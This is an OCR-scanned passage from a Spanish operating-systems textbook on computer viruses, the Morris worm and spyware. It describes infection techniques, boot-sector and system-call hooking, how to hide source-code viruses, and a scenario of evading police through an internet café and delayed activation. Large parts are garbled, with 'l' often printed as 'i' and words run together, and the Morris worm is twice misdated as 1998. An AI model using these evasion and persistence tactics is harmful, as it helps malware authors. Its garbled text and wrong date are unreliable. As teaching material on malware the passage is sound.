ba en infectar para generar un número aieatorio y después regresar en ia mayoría de ios casos sin 
hacer nada. Por ejempio, ia infección se iievaría a cabo en una de 128 iiamadas, con io cuai se re¬ 
duciría ia probabiiidad de que aiguien detectara ei virus antes de que pudiera esparcirse. Los virus 
bioiógicos tienen ia misma propiedad: ios que matan rápido a sus víctimas no se esparcen con tan¬ 
ta rapidez como ios que producen una muerte ienta y proiongada, dando a ias víctimas muchas opor¬ 
tunidades para esparcirá virus. Un diseño aiternativo sería tener una tasa de infección másaita (por 
ejempio, de 25%) pero una disminución en ei número de archivos infectados a ia vez, para reducir 
ia actividad dei disco y por ende ser menos conspicuo. 

En segundo iugar, infectar podría comprobar si ei archivo ya está infectado. Infectar un archivo 
dos veces sóio es una pérdida de tiempo. En tercer iugar, se podrían tomar medidas para dejar iguai ia 
hora de úitima modificación y ei tamaño ei archivo, para ayudar a ocuitar ia infección. Para ios pro¬ 
gramas más grandes que ei virus, ei tamaño no se modificará, pero para ios programas más pequeños 
queei virus ei programa será ahora más grande. Como ia mayoría de ios virus son más pequeños que 
ios programas, éste no es un probiema grave. 

A unque este programa no es muy extenso (ei programa compieto ocupa menos de una página de 
C y ei segmento de texto se compiia en menos de 2 KB), una versión en ensambiador de este virus 
podría ser aun más corta. L udwig (1998) proporciona un programa en código ensambiador para M S- 
DOS que infecta a todos ios archivos en su directorio y sóio ocupa 44 bytes cuando se ensambia. 

M ás adeiante en este capítuio estudiaremos ios programas antivirus: es decir, aqueiios que ras¬ 
trean y eiiminan virus. Es interesante observar aquí que ia iógica de ia figura 9-27 (que un virus se 
podría usar para buscar todos ios archivos ejecutabies e infectados) también ia podría utiiizar un 
programa antivirus para rastrear todos ios programas infectados y ei i minar ei virus. Lastecnoiogías 
de infección y desinfección van mano a mano, y ésta es ia razón por ia que es necesario compren¬ 
der en detaiie cómo funcionan ios virus: para poder combatidos de manera efectiva. 

Desde ei punto de vista de Virgiiio, ei probiema con un virus de sobrescritura es que se detec¬ 
ta con mucha faciiidad. Después de todo, cuando se ejecute un programa infectado puede esparcir ei 
virus un poco más, pero no hace io que debe hacer, y ei usuario detectará esto ai instante. En conse¬ 
cuencia, ia mayoría de ios virus se adjuntan ai programa y reaiizan su trabajo sucio, pero permite 
que ei programa funcione de manera normai de ahí en adeiante. A dichos virus se Íes iiama virus 
parasíticos. 
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Los virus parasíticos se pueden adjuntara ia parte frontai, posterioro mediadei programa eje- 
cutabie. Si un virus se adjunta a ia parte frontai, primero tiene que copiar ei programa en ia RAM, 
coiocarse ai frente y voiver a copiar ei programa de ia RA M después de sí mismo, como se mues¬ 
tra en ia figura 9-28(b). Por desgracia, ei programa no se ejecutará en su nueva dirección virtuai por 
i o que ei virus tiene que reubicar ei programa ai momento de moverio, o debe moverio a i a direc¬ 
ción virtuai 0 después de terminar su propia ejecución. 
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Figura 9-28. (a) U n programa ejecutable, (b) Con un virus en la parte frontal, (c) Con 
un virus al final, (d) Con un virus esparcido sobre el espacio libre dentro del programa. 

Para evitar cuaiquiera de ias compiejas opciones requeridas por estos virus que se cargan des¬ 
de ia parte frontai, ia mayoría de ios virus se cargan por ia parte posterior, por io que se adjuntan ai 
finai dei programa ejecutabie en vez de hacerio en ia parte frontai, y cambian ei campo de direc¬ 
ción iniciai en ei encabezado para que apunte ai inicio dei virus, como seiiustra en ia figura 9.28(c). 
Ahora ei virus se ejecutará en una dirección virtuai distinta dependiendo decuái programa infecta¬ 
do se esté ejecutando, pero todo esto significa queVirgiiio tiene que asegurarse que su virus sea in¬ 
dependiente de ia posición. Eso no es tan difícii de hacer para un programador experimentado, y 
aigunos compiiadores pueden hacerio cuando se Íes pide. 

Los formatos de programas ejecutabies compiejos, como ios archivos .exe en Windows y casi 
todos ios formatos binarios modernos de U NIX, permiten a un programa tener varios segmentos de 
texto y de datos, donde ei cargador ios ensambia en memoria y se encarga de ia reubicación ai ins¬ 
tante. En aigunos sistemas (Windows, por ejempio), todos ios segmentos (secciones) son múitipios 
de 512 bytes). Si un segmento no está iieno, ei vincuiador io iiena con Os. Un virus que compren¬ 
da esto puede tratar de ocuitarse en ios hoyos. Si cabe por compieto, como en ia figura 9-28(d), ei 
tamaño dei archivo permanece iguai ai dei archivo desinfectado, io cuai sin duda es una ventaja, ya 
que un virus ocuito es un virus feiiz. Los virus que utiiizan este principio se iiaman virus de cavi¬ 
dad. Por supuesto que si ei cargador no carga ias áreas de ia cavidad en ia memoria, ei virus nece¬ 
sitará otra forma de iniciarse. 


Virus residentes en memoria 

Hasta ahora hemos asumido que cuando se ejecuta un programa infectado se ejecuta ei virus, pasa 
ei controi ai programa reai y después termina. Por ei contrario, un virus residente en memoria per- 
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manece en la memoria (RA M ) todo el tiempo, ya sea ocultándose en la parte superior de la memo¬ 
ria, o tal vez escondiéndose en la parte inferior, entre los vectores de interrupción, donde los últi¬ 
mos cientos de bytes casi nunca se utilizan. Un virus muy inteligente puede incluso modificar el 
mapa de bits de la RAM del sistema operativo, para que el sistema piense que la memoria del virus 
está ocupada y así evitar que lo sobrescriba. 

U n virus residente en memoria típico captura una de las trampas o vectores de interrupción, pa¬ 
ra lo cual copia el contenido a una variable reutilizabley coloca ahí su propia dirección, con lo cual 
hace que la interrupción o trampa apunte hacia él. La mejor elección es la interrupción de llamadas 
al sistema. De esa forma, el virus se ejecuta (en modo de kernel) en cada llamada al sistema. Cuan¬ 
do termina, sólo invoca a la llamada real al sistema, para lo cual salta a la dirección de la trampa 
guardada. 

¿Por qué querría un virus ejecutarse en todas las llamadas al sistema? Para infectar programas, 
desde luego. El virus sólo tiene que esperar a que llegue una llamada al sistema exec y después, al 
saber que el archivo a la mano es un binario ejecutable (y probablemente uno útil), lo infecta. Este 
proceso no requiere de la actividad masiva en el disco de la figura 9-27, por lo que es mucho me¬ 
nos conspicuo. Además, al atrapar todas las llamadas al sistema, el virus obtiene un gran potencial 
para espiar los datos y realizar todo tipo de travesuras. 

Virus del sector de arranque 

Como vimos en el capítulo 5, cuando la mayoría de las computadoras se encienden, el BIOS lee el 
registro maestro de arranque de la parte inicial del disco de arranque y lo coloca en la RA M para eje¬ 
cutarlo. Este programa determina cuál partición está activa y lee el primer sector (el sector de arranque) 
de esa partición para ejecutarlo. Después, ese programa carga el sistema operativo o utiliza un carga¬ 
dor para cargarlo. Por desgracia, hace muchos años, uno de los amigos deVirgil tuvo la idea de crear 
un virus que pudiera sobrescribir el registro maestro de arranque o el sector de arranque, con resulta¬ 
dos devastadores. Dichos virus, conocidos como virus del sector de arranque, son muy comunes. 

Normalmente, un virus del sector de arranque [que incluye al virus del M BR (Registro maes¬ 
tro de arranque)] copia primero el verdadero sector de arranque en un lugar seguro en el disco, pa¬ 
ra que pueda iniciar el sistema operativo cuando termine. El programa de formato de discos de 
M icrosoft fdisk omite la primera pista, por lo que es un buen lugar para ocultarse en las máquinas 
con Windows. Otra opción es utilizar cualquier sector de disco libre y después actualizar la lista de 
sectores defectuosos para marcar el sector oculto como defectuoso. De hecho, si el virus es grande 
también puede disfrazarse como sectores defectuosos. Un virus realmente agresivo podría incluso 
asignar el espacio en disco normal para el verdadero sector de arranque y para sí mismo, y actuali¬ 
zar el mapa de bits o la lista de sectores libres del disco de manera acorde. Para ello se requiere de 
un conocimiento detallado de las estructuras de datos internas del sistema operativo, peroVirgil tu¬ 
vo un excelente profesor en su curso de sistemas operativos, y estudió duro. 

Cuando se inicia la computadora, el virus se copia a sí mismo en la RAM , ya sea en la parte 
superior o inferior, entre los vectores de interrupciones que no se utilizan. En este punto la máqui¬ 
na está en modo de kernel, con la M M U desactivada, sin sistema operativo ni programa antivirus 
que se ejecute. Es tiempo de fiesta para los virus. Cuando está listo, inicia el sistema operativo y 
por lo general permanece residente en la memoria, para poder observar la acción. 
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Sin embargo, uno de los problemas es cómo obtener otra vez el control más adelante. La for¬ 
ma usual es explotar el conocimiento específico sobre la forma en que el sistema operativo admi¬ 
nistra los vectores de interrupción. Por ejemplo, Windows no sobrescribe todos los vectores de 
interrupción de un solo golpe, sino que carga un driver de dispositivo a la vez y cada uno captura 
el vector de interrupciones que necesita. Este proceso puede durar un minuto. 

Con este diseño, el virus obtiene el manejador que desea. Empieza por capturar todos los vec¬ 
tores de interrupción, como se muestra en la figura 9-29(a). A medida que se cargan los drivers se 
sobrescriben algunos de los vectores, pero a menos que se cargue primero el driver del reloj, habrá 
muchas interrupciones de reloj más adelante para iniciar el virus. En la figura 9.29(b) se muestra la 
pérdida de la interrupción de la impresora. Tan pronto como el virus ve que uno de sus vectores de 
interrupción ha sido sobrescrito, puede volver a sobrescribir ese vector, con la certeza de que aho¬ 
ra es seguro (en realidad, algunos vectores de interrupción se sobrescriben varias veces durante el 
arranque, pero el patrón es determinístico y Virgilio lo sabe). En la figura 9-29(c) se muestra la re¬ 
captura de la impresora. Cuando se carga todo, el virus restaura todos los vectores de interrupción 
y guarda el vector de interrupciones de llamadas al sistema para él solo. En este punto tenemos un 
virus residente en memoria que controla las llamadas al sistema. De hecho, ésta es la forma en que 
la mayoría de los virus residentes en memoria empiezan su vida. 
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Figura 9-29. (a) Después de que el virus ha capturado todos los vectores de interrup¬ 
ción y trampa, (b) Después de que el sistema ha recapturado el vector de interrupción 
de la impresora, (c) Después de que el virus ha observado la pérdida del vector de in¬ 
terrupciones de la impresora y lo recaptura. 


Virus de driver de dispositivo 

Entrar a la memoria de esta forma es un poco similar a la espeleología (exploración de cavernas): 
hay que hacer contorsiones y preocuparse de que no se vaya a caer algo y nos pegue en la cabeza. 
Sería mucho más simple si el sistema operativo cargara el virus de manera oficial. Con un poco de 
trabajo, se puede lograr ese objetivo. El truco es infectar un driver de dispositivos, lo cual produce 
un virus de driver de dispositivo. En Windows y en algunos sistemas UNIX, los drivers de dispo- 
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sitivos son sólo programas ejecutables que viven en el disco y se cargan en tiempo de arranque. Si 
se puede infectar uno de estos programas, el virus siempre se cargará oficialmente en tiempo de 
arranque. Y todavía mejor, los drivers se ejecutan en modo de kernel, y después de que el sistema 
carga un driver lo llama, con lo cual el virus tiene la oportunidad de capturar el vector de trampas 
de llamadas al sistema. Este hecho en sí es en realidad un sólido argumento para ejecutar los dri¬ 
vers de dispositivos como programas en modo de usuario: si se infectan no pueden hacer tanto da¬ 
ño como los drivers en modo de kernel. 

Virus de macro 

M uchos programas como Word y Excel permiten a los usuarios escribir macros para agrupar varios 
comandos que se pueden ejecutar después con una sola pulsación de tecla. Las macros también se 
pueden adjuntar a los elementos de los menús, de manera que cuando se seleccione uno de ellos, 
se ejecute la macro. En M icrosoft Office las macros pueden contener programas completos en Vi¬ 
sual Basic, el cual es un lenguaje de programación completo. Las macros se interpretan en vez de 
compilarlas, pero eso sólo afecta a la velocidad de ejecución, no a lo que pueden hacer. Como las 
macros pueden ser específicas para cada documento. Office almacena las macros para cada docu¬ 
mento, junto con el documento. 

Ahora viene el problema. Virgilio escribe un documento en Word y crea una macro que adjun¬ 
ta a la función OREN FILE (abrir archivo). La macro contiene un virus de macro. Después envía 
el documento por e-mail a la víctima, quien por supuesto lo abre (suponiendo que el programa de 
correo electrónico no lo haya hecho ya). Al abrir el documento se ejecuta la macro OREN FILE. 
Como la macro puede contener un programa arbitrario, puede hacer cualquier cosa como infectar 
otros documentos de Word o borrar archivos, por ejemplo. Rara hacer justicia a M icrosoft, Word 
proporciona una advertencia al abrir un archivo con macros, pero la mayoría de los usuarios no en¬ 
tienden lo que esto significa y de todas formas abren el archivo. Además, los documentos legítimos 
también pueden contener macros. Y hay otros programas que ni siquiera proporcionan esta adver¬ 
tencia, con lo cual es aún más difícil detectar un virus. 

Con el crecimiento de los adjuntos de correo electrónico, es un problema inmenso enviar do¬ 
cumentos con virus incrustados en las macros. Es mucho más fácil escribir esos virus que ocultar 
el verdadero sector de arranque en alguna parte de la lista de bloques defectuosos, ocultar el virus 
entre los vectores de interrupción y capturar el vector de trampas de llamadas al sistema. Esto sig¬ 
nifica que cada vez hay más personas con menos conocimientos técnicos que pueden escribir virus, 
lo cual reduce la calidad general del producto y da a los virus una mala reputación. 

Virus de código fuente 

Los virus parasíticos y del sector de arranque son muy específicos para cada plataforma: los virus 
de documentos son un poco menos específicos (Word se ejecuta en Windows y M acintosh, pero no 
en UNIX). Los virus más portátiles de todos son los virus de código fuente. Imagine el virus de la 
figura 9-27, pero con la modificación de que en vez de buscar archivos ejecutables binarios busca 
programas en C, para lo cual sólo hay que cambiar una línea (la llamada a access). 
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Hay que cambiar el procedimiento infectar e insertarle la línea 
#inclucle <virus.h> 

en la parte superior de cada programa de código fuente en C. Hay que insertar también la siguien¬ 
te línea: 

ejecutar_virus(); 

para activar el virus. Para decidir dónde se debe colocar esta línea se requiere cierta habilidad para 
analizar el código fuente en C, ya que debe ser en un lugar que permita llamadas a procedimientos 
sin problemas sintácticos, y además no debe ser un lugar en el que el código estaría muerto (por 
ejemplo, después de una instrucción retunn). Tampoco sirve colocarlo a la mitad de un comentario, 
y podría ser demasiado colocarlo dentro de un ciclo. Si suponemos que la llamada se puede colo¬ 
car en forma apropiada (es decir, justo antes del final de main o antes de la instrucción return, si la 
hay), al momento de compilar el programa seincluirá el virus, tomado de virus.h (aunque proj.h po¬ 
dría atraer menos atención, en caso de que alguien lo viera). 

Cuando se ejecute el programa, se hará una llamada al virus. Éste puede hacer todo lo que quie¬ 
ra: por ejemplo, buscar otros programas deC para infectarlos. Si encuentra uno, puede incluir sólo 
las dos líneas antes descritas, pero esto sólo funcionará en la máquina local, en donde se supone que 
virus.h ya está instalado. Para que esto funcione en una máquina remota, hay que incluir todo el có¬ 
digo fuente del virus. Para ello se puede incluir el código fuente del virus como una cadena de ca¬ 
racteres inicializada, de preferencia como una lista de enteros hexadecimales de 32 bits para evitar 
que alguien averigüe lo que hace. Tal vez esta cadena sea muy larga, pero con el código actual que 
consta de una cantidad exorbitante de líneas, puede pasar desapercibido. 

Para el lector sin experiencia, estos métodos pueden parecer bastante complicados. Tal vez se 
preguntes! se podrían hacer funcionar en la práctica. Y de hecho, sí se puede. Virgilio es un excelen¬ 
te programador y tiene mucho tiempo libre. Compruebe su periódico local para encontrar pruebas. 

C ómo se esparcen los virus 

Hay varios escenarios para la distribución. Empecemos con el clásico. Virgilio escribe su virus, lo 
inserta en un programa que ha escrito (o robado) y empieza a distribuirlo: por ejemplo, lo puede co¬ 
locar en un sitio Web de Shareware. En algún momento dado, alguien descarga el programa y lo eje¬ 
cuta. En este punto hay varias opciones. Para empezar, tal vez el virus infecte más archivos en el 
disco duro, sólo en caso de que la víctima decida compartir algunos con un amigo más tarde. Tam¬ 
bién puede tratar de infectar el sector de arranque del disco duro. U na vez infectado este sector, es 
fácil iniciar un virus residente en memoria en modo de kernel en los siguientes arranques. 

En la actualidad, también hay otras opciones disponibles para Virgilio. El virus se puede escri¬ 
bir de manera que compruebe si la máquina infectada está en una LAN, algo que es muy probable 
en una máquina que pertenece a una empresa o universidad. Después el virus puede empezar a in¬ 
fectar archivos desprotegidos en todos los servidores conectados a la LAN. Esta infección no se ex¬ 
tiende a los archivos protegidos, pero para resolverlo hay que hacer que los programas infectados 
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actúen en forma extraña. Es muy probable que un usuario que ejecute dicho programa ie pida ayu¬ 
dar ai administrador dei sistema. Luego ei administrador probará ei programa extraño por sí mismo, 
para ver qué ocurre. Si ei administrador reaiiza esto mientras esté conectado como superusuario, ei 
virus puede infectar ahora ios archivos binarios dei sistema, ios drivers de dispositivos, ei sistema 
operativo y ios sectores de arranque. Todo io que se requiere es un error como éste y todas ias má¬ 
quinas en ia LAN estarán comprometidas. 

A menudo, ias máquinas en una LAN tienen autorización de conectarse a ias máquinas remo¬ 
tas a través de Internet o una red privada, o inciuso tienen autorización para ejecutar comandos en 
forma remota sin iniciar sesión. Esta habiiidad ofrece a ios virus más oportunidad para esparcirse. 
Por ende, un error inocente puede infectar a toda ia empresa. Para evitar este escenario, todas ias 
empresas deben tener una directiva generai que indique a ios administradores no cometer errores. 

Otra forma de esparcir un virus es pubiicar un programa infectado en un grupo de noticias de 
USENET o un sitio Web en ei que se pubiiquen programas con reguiaridad. También es posibie 
crear una página Web que requiera un compiemento de navegador especiai para veria, y después 
asegurarse que ios compiementos estén infectados. 

Un ataque distinto es infectar un documento y después enviado por correo eiectrónico a mu¬ 
chas personas, o transmitido a una iista de correo o grupo de noticias de USENET, por io generai 
como un adjunto. Inciuso ias personas que nunca imaginarían ejecutar un programa que Íes envió 
aigún extraño, tai vez no se den cuenta de que ai hacer ciic en ei adjunto para abririo se puede iibe- 
rar un virus en su máquina. Para empeorar más ias cosas, ei virus puede entonces buscar ia iibreta 
de direcciones dei usuario y después enviarse por correo a todos ios remitentes de esa iista, por io 
generai con una iínea deAsunto que tenga una apariencia iegítima o interesante, como 

Asunto: Cambio de planes 
Asunto: Re: ese último correo electrónico 
Asunto: El perro murió anoche 
Asunto: Estoy gravemente enfermo 
Asunto: Te amo 


Cuando llega el correo electrónico, el receptor ve que el emisores un amigo o colega, y por lo tan¬ 
to no sospecha nada. Una vez que abre el correo, es demasiado tarde. El virus "I LOVE YOU" que 
se esparció por el mundo en junio del 2000 trabajaba de esta forma y realizó daños hasta por mil 
millones de dólares. 

El esparcimiento de la tecnología de los virus está relacionado en parte con el esparcimiento 
actual de los virus activos. H ay grupos de escritores de virus que se comunican constantemente por 
Internet y se ayudan a desarrollar nueva tecnología, nuevas herramientas y virus. Es probable que 
la mayor parte de estas personas sean aficionados en vez de criminales, pero los efectos pueden ser 
igual de devastadores. Los militares son otra categoría de escritores de virus, ya que los ven como 
un arma de guerra, que potencial mente podría deshabilitar las computadoras de un enemigo. 

Otra cuestión relacionada con el esparcimiento de virus es la de evitar la detección: las cárce¬ 
les son notorias por sus instalaciones de cómputo deficientes, por lo que Virgilio preferiría evitar¬ 
las. Si publica el virus inicial desde la computadora que tiene en su casa, corre cierto riesgo. Si el 
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ataque tiene éxito, ia poiicía podría rastreado ai buscar ia etiqueta de hora y fecha más reciente en 
ei mensaje dei virus, ya que es probabiemente ia más cercana ai origen dei ataque. 

Para minimizar su exposición, Virgiiio podría ir a un café Internet en una ciudad distante, y co¬ 
nectarse desde ahí. Puede iievar ei virus en una memoria USB o CD-ROM e impiantario ei mismo 
en una computadora, o si ias máquinas no tienen puertos USB ni unidades de CD-ROM , puede pe¬ 
dir a ia amabie asistente que por favor iea ei archivo iibro.doc para poder imprimido. Una vez en 
su disco duro, ie cambia ei nombre a virus.exe y io ejecuta, infectando toda ia LAN con un virus 
que se activa un mes después, sóio en caso de que ia poiicía decida pedir a ias aeroiíneas una iista 
de todas ias personas que viajaron en avión esa semana. 

Una aiternativa a ia memoria USB y ei CD-ROM es obtener ei virus de un sitio FTP remo¬ 
to. O iievar una notebook y conectada a un puerto Ethernet que proporcione ei café Internet pa¬ 
ra los turistas que viajan con su notebook y desean leer su correo electrónico todos los días. U na 
vez conectado a la LAN, Virgilio puede prepararse para infectar a todas las máquinas que estén 
conectadas. 

Hay mucho más que decir sobre los virus. En especial, la forma en que tratan de ocultarse y la 
manera en que el software antivirus trata de eliminarlos. M ás adelante en este capítulo volveremos 
a tocar estos temas, después de ver las defensas contra el malware. 


9.7.3 Gusanos 

La primera violación a la seguridad computacional en Internet a gran escala empezó en la tarde del 
2 de noviembre de 1998, cuando un estudiante graduado de Cornel llamado Robert Tappan M orris 
liberó un programa tipo gusano en Internet. Esta acción inhabilitó a miles de computadoras en uni¬ 
versidades, empresas y laboratorios gubernamentales por todo el mundo antes de que pudieran ras¬ 
trear y eliminar el gusano. A continuación analizaremos los puntos importantes de este suceso. Para 
obtener más información técnica, consulte el artículo de Spafford (1989). El libro de Hafner y M ar- 
koff (1991) presenta esta historia como un thriller policiaco. 

La historia empezó en algún momento en 1998, cuando M orris descubrió dos errores en Ber- 
keley UNIX que permitían obtener acceso no autorizado a las máquinas a través de I nternet. Traba¬ 
jando por su cuenta, escribió un programa llamado gusano que se duplicaba a sí mismo, el cual 
podía explotar estos errores y duplicarse en segundos en cada máquina a la que podía obtener ac¬ 
ceso. Trabajó en el programa durante meses, tiempo en el cual lo optimizó con cuidado e hizo que 
tratara de ocultar su pista. 

No se sabe si la liberación en noviembre2 de 1998 era una prueba o era algo real. En cualquier 
caso, hizo que la mayoría de los sistemas Sun y VAX en Internet se doblegaran a unas cuantas ho¬ 
ras de la liberación del gusano. La motivación de M orris se desconoce: es posible que considerara 
todo como una broma de alta tecnología, pero que debido a un error de programación se le haya sa¬ 
lido de las manos. 

Técnicamente, el gusano consistía en dos programas: el bootstrap y el gusano en sí. El boots- 
trap tenía 99 líneas de C y se llamaba II.c. Se compilaba y ejecutaba en el sistema al que estaba ata¬ 
cando. Una vez en ejecución, se conectaba a la máquina de la que había llegado, enviaba el 
programa principal del gusano y lo ejecutaba. Después de esforzarse por ocultar su existencia. 
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el gusano analizaba las tablas de enrutamiento de su nuevo host para ver a qué máquinas estaba co¬ 
nectado y trataba de esparcir el bootstrap a esas máquinas. 

Se intentaban tres métodos para infectar a las nuevas máquinas. El método 1 era tratar de eje¬ 
cutar un Shell remoto mediante el comando rsh. A Igunas máquinas confían en otras, y ejecutan rsh 
sin ningún tipo de autenticación. Si esto funcionaba, el shell remoto actualizaba el programa del gu¬ 
sano y seguía infectando nuevas máquinas desde ahí. 

El método 2 utilizaba un programa presente en todos los sistemas llamado finger, el cual per¬ 
mite que un usuario en cualquier parte de Internet escriba 

finger nombre@sitio 

para mostrar información sobre una persona en una instalación específica. Por lo general, esta infor¬ 
mación incluye el nombre real de la persona, su nombre de inicio de sesión, las direcciones de su 
hogar y su empleo junto con los números telefónicos, el nombre de la secretaria y el número telefóni¬ 
co, número de FAX e información similar. Es el equivalente electrónico de la agenda telefónica. 

Finger funciona de la siguiente manera. En cada sitio hay un proceso de segundo plano llama¬ 
do demonio finger, el cual se ejecuta todo el tiempo atendiendo y respondiendo consultas a través 
de Internet. Lo que hacía el gusano era llamar a finger con una cadena especial de 536 bytes como 
parámetro. Esta larga cadena desbordaba el búfer del demonio y sobrescribía su pila, de la manera 
que se muestra en la figura 9-24(c). El error que se explotaba aquí era que el demonio no compro¬ 
baba el desbordamiento. Cuando el demonio regresaba del procedimiento en el que se encontraba 
al momento de recibir la petición, no regresaba a main sino a un procedimiento dentro de la cade¬ 
na de 536 bytes en la pila. Este procedimiento trataba de ejecutar a sh. Si funcionaba, el gusano aho¬ 
ra tenía un shell ejecutándose en la máquina a la que estaba atacando. 

El método 3 dependía de un error en el sistema de correo (sendmail), el cual permitía que el 
gusano enviara una copia del boostrap para ejecutarla. 

U na vez establecido, el gusano trataba de quebrantar las contraseñas délos usuarios. M orris no 
tenía que investigar mucho acerca de cómo poder lograr esto. Todo lo que tuvo que hacer fue pre¬ 
guntar a su padre, un experto de seguridad en la Agencia Nacional de Seguridad, la agencia del go¬ 
bierno de los EE.UU. dedicada a quebrantar códigos, para que le proporcionara una reimpresión de 
un artículo clásico sobre el tema, que su padre y K en Thompson habían escrito una década antes en 
Bell Labs (Morris y Thompson, 1979). Cada contraseña quebrantada permitía al gusano iniciar se¬ 
sión en cualquier máquina en la que el propietario de la contraseña tuviera cuentas. 

Cada vez que el gusano obtenía acceso a una nueva máquina, comprobaba si había otras copias 
activas del gusano ahí. De ser así, la nueva copia dejaba de ejecutarse, excepto que una de siete ve¬ 
ces seguía en ejecución, tal vez en un intento por seguir propagando el gusano, incluso aunque el 
administrador del sistema iniciara su propia versión del gusano para engañar al gusano real. Con es¬ 
te proceso se creaban demasiados gusanos, y esto era la razón del por qué todas las máquinas infec¬ 
tadas dejaban de funcionar en un momento dado: estaban infestadas de gusanos. Si M orris hubiera 
omitido esto y el gusano simplemente dejara de ejecutarse al detectar otro gusano, tal vez nunca lo 
hubieran detectado. 

A M orris lo atraparon cuando uno de sus amigos habló con el reportero de computadoras del 
New York Times j ohn M arkoff, y trató de convencerlo de que el incidente había sido un accidente. 
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que el gusano era inofensivo y que ei autor io sentía. Ei amigo dijo sin darse cuenta que ei nom¬ 
bre de inicio de sesión dei perpetrador era rtm. Erafácii convertir rtm en ei nombre dei propieta¬ 
rio: todo io que M arkoff tuvo que hacer fue ejecutar finger. Ai siguiente día ia historia estaba en 
ia sección principai de ia primera página, e inciusiveeciipsó ia eiección presidenciai tres días des¬ 
pués. 

Una cortefederai juzgó y condenó a M orris. Fue sentenciado a una muita de 10,000, 3 años de 
iibertad condicionai y 400 horas de servicio comunitario. Sus costos iegaies probabiemente exce¬ 
dieron ios 150,000. Esta sentencia generó mucha controversia. M uchos en ia comunidad compu- 
tacionai sentían que era un briiiante estudiante graduado, cuya broma inofensiva se había saiido de 
controi. Nada en ei gusano sugería que M orris tratara de robar o dañar aigo. Otros sentían que era 
un criminai serio y debería haber ido a ia cárcei. Tiempo después, M orris obtuvo su Ph. D. de Har¬ 
vard y ahora es profesor en ei M .1 .T. 

Un efecto permanente de este incidente fue ei estabiecimiento dei CERT (Computer Emer- 
gency Response Team, Equipo de respuesta a emergencias computacionaies), que proporciona 
un iugar centrai para reportar ios intentos de entrar a un sistema sin autorización, y un grupo de ex¬ 
pertos para anaiizar ios probiemas de seguridad y diseñar correcciones. Aunque sin duda esta ac¬ 
ción fue un paso hacia adeiante, también tuvo su iado negativo. CERT recoiecta información sobre 
ias faiias de ios sistemas que pueden sufrir ataques y ia maneras de corregidas. Por necesidad, po¬ 
ne esta información en circuiación a nivei mundiai para mi i es de administradores de sistemas en In¬ 
ternet. Por desgracia, ios tipos maios (que tai vez se hagan pasar por administradores de sistemas) 
también pueden obtener ios reportes de errores y expiotar esas iagunas durante horas (o inciuso 
días) antes de que se cierren. 

Después dei gusano de M orris se iiberó una variedad de gusanos más. Éstos operan con ios 
mismos iineamientos que ei gusano de M orris, sóio que expiotan distintos errores en otro tipo de 
software. Tienden a esparcirse con mayor rapidez que ios virus, ya que se despiezan por su cuenta. 
Como consecuencia se está desarroiiando ia tecnoiogía anti-gusanos para atrapados justo cuando 
aparecen por primera vez, en vez de esperar a que cataioguen e introduzcan ei gusano en una base 
de datos centrai (Portokaiidis y Bos, 2007). 

9.7.4 Spyware 

Ei spyware es un tipo de maiware cada vez más común. En generai, ei spyware es software que se 
carga de manera ciandestina en una PC sin que su propietario se entere, y se ejecuta en segundo pia¬ 
no para hacer cosas a espaidas dei propietario. Sin embargo, definido es aigo compiicado. Porejem- 
pio, Windows Update descarga de manera automática ios parches de seguridad en ias máquinas 
Windows sin que ios propietarios se enteren. De iguai forma, muchos programas antivirus se actua- 
iizan de manera automática en segundo piano. Nada de esto seconsidera spyware. Si PotterStewart 
estuviera vivo, probabiemente diría aigo como: "No puedo definir ei spyware, pero io reconozco 
cuando io veo".i" 


t Potter Stewart fue un juez en la Suprema Corte de los EUA de 1958 a 1981. Ahora es famoso por escribir una opinión so¬ 
bre un caso relacionado con la pornografía, en el cual admitió no poder definir la pornografía, pero dijo "la reconozco cuan¬ 
do la veo”. 
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Otros se han esforzado mucho por definirlo. Barwinski y sus colaboradores (2006) dijeron que 
tiene cuatro características. En primer lugar se oculta, por lo que la víctima no puede encontrarlo 
con facilidad. En segundo lugar, recolecta datos sobre el usuario (sitios Web visitados, contraseñas 
e incluso números de tarjetas de crédito). En tercer lugar, comunica la información recolectada de 
vuelta a su amo distante. Y en cuarto lugar, trata de sobrevivir a los distintos intentos por eliminar¬ 
lo. Además, cierto spyware modifica la configuración y realiza otras actividades maliciosas y mo¬ 
lestas, como veremos a continuación. 

Barwinsky y sus colaboradores dividieron el spyware en tres amplias categorías. La primera es 
el marketing: el spyware sólo recolecta información y la envía de vuelta a su amo, por lo general 
para poder tener una mejor publicidad dirigida a máquinas específicas. La segunda categoría es la 
vigilancia, en donde las empresas colocan spyware de manera intencional en las máquinas de los 
empleados para llevar el registro de lo que hacen y los sitios Web que visitan. La tercera categoría 
se acerca al malware clásico, en donde la máquina infectada se convierte en parte de un arreglo de 
zombies en espera a que su amo les de órdenes para desplazarse. 

Estos investigadores hicieron un experimento para ver qué tipos de sitios Web contienen spy¬ 
ware, al visitar 5000 sitios. Observaron que los principales proveedores de spyware son sitios Web 
relacionados con el entretenimiento para adultos, viajes en línea y bienes raíces. 

En la Universidad de Washington se realizó un estudio más grande (M oshchuk y colaboradores, 
2006). En este estudio se inspeccionaron unos 18 millones de URLs, de los cuales se descubrió que 
casi 6% contiene spyware. Por ende, no es sorpresa que en un estudio realizado por AOL/NCSA 
que ellos citan, 80% de las computadoras domésticas inspeccionadas estaban infestadas por spywa¬ 
re, con un promedio de 93 piezas de spyware por computadora. El estudio de la UW descubrió que 
los sitios para adultos, de celebridades y de papel tapiz para computadora tenían las tasas de infec¬ 
ción más grandes, pero no examinaron los viajes ni bienes raíces. 

C ómo se esparce el spyware 

La siguiente pregunta obvia es: "¿Cómo se infecta con spyware una computadora?". Una de las 
formas es por medio de un caballo de Troya, o troyano, de manera similar al malware. Hay una can¬ 
tidad considerable de software gratuito que contiene spyware, y el autor del software hace dinero 
con este spyware. El software de compartición de archivos punto a punto (como Kazaa) está lleno 
de spyware. Además, muchos sitios Web muestran anuncios de pancarta que llevan a los navegan¬ 
tes a páginas Web infestadas de spyware. 

La otra ruta principal de infección se conoce a menudo como descarga de paso. Es posible ad¬ 
quirir spyware (de hecho, cualquier tipo de malware) con sólo visitar una página Web infectada. 
Hay tres variantes de la tecnología de infección. En primer lugar, la página Web puede redirigir el 
navegador a un archivo ejecutable (.exe). Cuando el navegador ve el archivo, aparece un cuadro de 
diálogo preguntando al usuario si desea ejecutar o guardar el programa. Como las descargas legíti¬ 
mas utilizan el mismo mecanismo, la mayoría de los usuarios sólo hacen clic en Ejecutar, con lo 
cual el navegador descarga y ejecuta el software. En este punto, la máquina está infectada y el spy¬ 
ware ti ene la libertad de hacer lo que quiera. 

